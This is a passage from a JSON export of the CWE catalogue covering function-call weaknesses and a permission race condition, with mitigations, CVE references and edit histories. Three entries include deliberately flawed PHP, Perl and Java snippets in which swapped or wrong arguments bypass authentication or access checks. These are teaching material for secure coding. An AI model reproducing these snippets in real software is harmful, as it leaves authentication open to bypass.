Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"128"}},{"attr":{"@_CAPEC_ID":"129"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 7: Integer Overflows." Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Signed Integer Boundaries", Page 220"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"683":{"attr":{"@_ID":"683","@_Name":"Function Call With Incorrect Order of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses.","Extended_Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers or types of arguments, such as format strings in C. It also can occur in languages or environments that do not enforce strong typing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use the function, procedure, or routine as specified."},{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"Application calls functions with arguments in the wrong order, allowing attacker to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"684":{"attr":{"@_ID":"684","@_Name":"Incorrect Provision of Specified Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not function according to its published specifications, potentially leading to incorrect usage.","Extended_Description":"When providing functionality to an external party, it is important that the software behaves in accordance with the details specified. When requirements of nuances are not documented, the functionality may produce unintended behaviors for the caller, possibly leading to an exploitable state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that your code strictly conforms to specifications."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"PRE09-C","Entry_Name":"Do not replace secure functions with less secure functions"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Provide Specified Functionality","attr":{"@_Date":"2011-03-29"}}}},"685":{"attr":{"@_ID":"685","@_Name":"Function Call With Incorrect Number of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in languages or environments that do not require that functions always be called with the correct number of arguments, such as Perl."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"686":{"attr":{"@_ID":"686","@_Name":"Function Call With Incorrect Argument Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses.","Extended_Description":"This weakness is most likely to occur in loosely typed languages, or in strongly typed languages in which the types of variable arguments cannot be enforced at compilation time, or where there is implicit casting.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"687":{"attr":{"@_ID":"687","@_Name":"Function Call With Incorrectly Specified Argument Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Static Analysis","Description":"This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") && $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM04-C","Entry_Name":"Do not perform zero length allocations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"When primary, this weakness is most likely to occur in rarely-tested code, since the wrong value can change the semantic meaning of the program\'s execution and lead to obviously-incorrect behavior. It can also be resultant from issues in which the program assigns the wrong value to a variable, and that variable is later used in a function call. In that sense, this issue could be argued as having chaining relationships with many implementation errors in CWE.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"688":{"attr":{"@_ID":"688","@_Name":"Function Call With Incorrect Variable or Reference as Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in loosely typed languages or environments. This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2548","Description":"Kernel code specifies the wrong variable in first argument, leading to resultant NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2548"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"689":{"attr":{"@_ID":"689","@_Name":"Permission Race Condition During Resource Copy","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Draft"},"Description":"The product, while copying or cloning a resource, does not set the resource\'s permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["Common examples occur in file archive extraction, in which the product begins the extraction with insecure default permissions, then only sets the final permissions (as specified in the archive) once the copy is complete. The larger the archive, the larger the timing window for the race condition.","This weakness has also occurred in some operating system utilities that perform copies of deeply nested directories containing a large number of files.","This weakness can occur in any type of functionality that involves copying objects or resources in a multi-user environment, including at the application level. For example, a document management system might allow a user to copy a private document, but if it does not set the new copy to be private as soon as the copy begins, then other users might be able to view the document while the copy is still taking place."]}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application 